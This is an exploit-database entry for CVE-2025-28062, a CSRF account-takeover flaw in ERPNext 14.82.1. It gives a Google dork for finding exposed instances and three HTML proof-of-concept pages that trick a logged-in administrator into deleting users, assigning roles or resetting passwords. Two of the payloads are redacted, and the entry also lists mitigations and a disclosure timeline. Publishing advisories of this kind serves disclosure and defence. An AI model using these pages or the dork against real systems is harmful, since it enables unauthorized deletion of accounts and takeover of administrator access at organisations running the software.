ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)

Author: Ahmed Thaiban
type: webapps
platform: python
port: 
date_added: 2025-05-06  
date_updated: 2025-05-06  
verified: 0  
codes: CVE-2025-28062  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 52283.txt  
# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps

# Description:
A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.

Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs

Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change

The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.

---

# PoC 1: Delete a User

<html>
  <body>
    <h2>Delete User</h2>
    <a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
      Click Here
    </a>
  </body>
</html>

---

# PoC 2: Assign Role

<html>
  <body>
    <h2>Assign Role to User</h2>
    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
      Add Role
    </a>
  </body>
</html>

---

# PoC 3: Reset Password

<html>
  <body>
    <h2>Reset User Password</h2>
    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
      Reset Password
    </a>
  </body>
</html>

---

# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes

---

# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory

---

# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne

# References:
- https://owasp.org/www-community/attacks/csrf